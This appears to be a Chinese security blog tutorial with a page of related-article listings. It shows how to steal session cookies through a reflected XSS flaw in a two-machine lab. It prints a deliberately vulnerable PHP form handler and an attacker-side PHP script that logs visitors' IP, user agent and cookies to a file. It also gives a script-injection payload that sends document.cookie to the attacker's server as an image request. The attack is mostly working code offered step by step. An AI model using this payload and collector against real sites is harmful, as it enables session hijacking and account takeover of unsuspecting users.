利用XSS盗取cookie

最新推荐文章于 2024-01-15 08:00:00 发布
最新推荐文章于 2024-01-15 08:00:00 发布
阅读量1.7k 收藏
点赞数
分类专栏: web安全 文章标签: xss 安全
试验环境
攻击机器  10.1.36.181 stealcookies.php cookie.txt
受害服务器 10.1.36.34 victim.php victim.html


(1)受害者有xss漏洞的脚本victim.php (问题字段用红色标明) 
<?php
session_start();
session_regenerate_id();
echo session_id()."<br/>";
if(isset($_POST["login"]))
{
echo "Hello " .$_POST["name"]."<br/>";
}
?>
(2)对应表单 victim.html 
<html>
<body>
<form id ="form1" name="form1" method="post" action="victim.php">
<label>Name
<input name="name" type="text" id="name"/>
</label>
<input name="login" type="submit" id="login" value="submit"/>
</form>
</body>
</html>


正常流程
   简单的利用xss盗取cookie实例 - 碳基体 - 碳基体 简单的利用xss盗取cookie实例 - 碳基体 - 碳基体


(3)攻击者盗取cookie的脚本 stealcookies.php 
<?php
$ua = $_SERVER["HTTP_USER_AGENT"];
$client_ip = $_SERVER["REMOTE_ADDR"];
$method = $_SERVER["REQUEST_METHOD"];
$referer = $_SERVER["HTTP_REFERER"];
$date = date("F j, Y, g:i a");
$querystring = $_SERVER["QUERY_STRING"];
$log = fopen("cookie.txt","a+");
$str= "IP: $client_ip |Useragent: $ua | Method: $method | REF: $referer | Date: $date  | Cookie: $querystring \n";
fwrite($log,$str);
?>
脚本运行的前提条件,在stealcookies.php同一根目录下,有一个有写权限的文件 cookie.txt

攻击流程
 在 http://10.1.36.34/victim.html的表单中提交以下语句 
<script>document.write('<img src="http://10.1.36.181/stealcookies.php?a=' + encodeURI(document.cookie) + '"/>')</script>
js的意思是生成一个包含攻击者url的图片
简单的利用xss盗取cookie实例 - 碳基体 - 碳基体

接着我们可以看到访问该页面用户的cookie写入到了攻击者的cookie.txt文件里

查看攻击者10.1.36.181上的cookie.txt文件 
cat cookie.txt
简单的利用xss盗取cookie实例 - 碳基体 - 碳基体
 
可以看到收到cookie了。

huchendushen
关注
专栏目录
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7273
XSS利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
XSS实现cookie盗取
一期一会的博客
04-08 1053
XSS实现cookie盗取 在一台win7上搭建xss,另外一台搭建留言板(一个网站),两台虚拟机之间能够ping通,在留言板上留言,管理员回复留言,xss上获取到cookie,利用中国菜刀通过获取的cookie用管理员账号登录。 实验环境: ​ Windows 7 192.168.1.128 (搭建xss) ​ Windows 7 192.168.1.100 (安装小旋风) xss平台搭建好以后,进入管理员账户,复制邀请码,退出登录,利用邀请码重新注册一个test11的账户
安全】P 4-2 XSS盗取cookie
Z_David_Z的博客
02-17 506
目录0X01 cookie介绍0X02 反射XSS盗取cookie0X03 利用cookie会话劫持0X04 劫持会话后的操作 0X01 cookie介绍 Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。 目前有些 Cookie 是临时的,有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间,一旦超过规定的时间,该 Cookie 就会被系统清除 服务器可
XSS攻击之窃取Cookie
weixin_34032792的博客
08-15 114
2019独角兽企业重金招聘Python工程师标准>>> ...
利用xsscookie教学
cnbird's blog
06-24 4585
使用的工具: 1.免费网页支援PHP 2.存在xss的脆弱的网站。 vb.php为存放cookie的网页 PHP Code:Cookies Stealther - Designed and programmed by R00t[ATI]or="#C0C0C0">COOKIES STEALTHERBy R00T[AT
XSS 盗取 Cookie 实验
m0_63645854的博客
04-01 405
本文主要介绍了XSS盗取Cookie流程
第二节 XSS盗取cookie-01
09-15
XSS盗取cookie详解 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击手法,通过inject恶意脚本来盗取用户的Cookie信息。下面我们将详细介绍XSS盗取cookie的攻击原理、实施方法和防御策略。 Cookie...
Web应用安全XSS盗取cookiepayload(实验习题).docx
06-17
XSS 盗取 Cookie 是一种常见的 XSS 攻击方式,攻击者通过在网站上注入恶意脚本,获取用户的 Cookie,从而以用户的身份访问网站。 XSS 盗取 Cookie 的流程 1. 攻击者将可以获取并发送管理员的 Cookie 的恶意 XSS ...
XSS的高级利用盗取用户Cookie
Zeker62的博客
08-13 1180
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级的利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介: Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存中,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
网络安全学习笔记——盗取Cookies跨站脚本(XSS
just do it
07-24 1600
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
XSS平台偷取cookie使用+XSS漏洞
NSQ0207的博客
07-24 2631
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
ctf xss利用_利用存储XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1623
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
TOP16-XSS -- 小黑超细详解-+案例说明(盗取cookie登录)<宝藏文>
G_WEB_Xie的博客
04-03 1319
概念:通常指通过HTML注入篡改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。当入侵网站后,通过自己编定的脚本或者木马嵌入到网站页面,利用网站的流量将自己的网页木马传播出去从而达到自己的目的,当用户浏览网站的时候点击了编订的恶意程序脚本,从而达到获取用户信息,进行一系列未授权的操作。通俗理解:此漏洞主要以盗取用户信息, 获取用户的权限做一些越权操作,还可以结合其它漏洞进行一系列的攻击行为。
xsscookie窃取
weixin_30911809的博客
03-07 584
一、窃取cookie有什么用? cookie相当于一个身份证 有了管理员的cookie我们不需要帐号密码就可以登陆 二、反射型xss有存贮型xss什么区别? 反射 xss和服务器没有交互 只能用一次 储存 xss和服务器有交互 可以反复使用 危害较大 三、本次教程用到的工具 1.phpstudy(PHP调试环境的程序集成包) 2.dv...
XSS盗取cookie
qq_43776408的博客
07-27 1019
cookie介绍 反射XSS盗取cookie location是重定向一个新的URL 在这个新的URL中提交cookie参数 后面的document是属于之前ur 获取当前网站的cookiel cookie.php代码意思 通过get方式获取当前cookie 然后写到文件中 复制代码到网址栏后 或者复制到DVWA框中 返回网站根目录 出现cookie文件 利用cookie会话劫持 把画红圈中的内容修改为cookie.txt中的内容 这样的话就直接登陆了 就不用还要login.php 直接index.p
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 4344
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
利用XSS漏洞打cookie
最新发布
qq_68163788的博客
01-15 1869
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
XSS偷取密码Cookies通用脚本
收集盒 Book box
08-30 1003
很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。 今天写个通用脚本工具 文件如下 asp.asp或者php.php 或者cookies.htm效果如下 保存文本 发送邮件 获取的cookies
使用xss钓鱼盗取用户cookie
m0_74805513的博客
07-27 1049
那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到。很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie
xss盗取cookie
07-28
- *1* *2* [xss盗取cookie原理剖析](https://blog.csdn.net/weixin_51692662/article/details/127407078)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值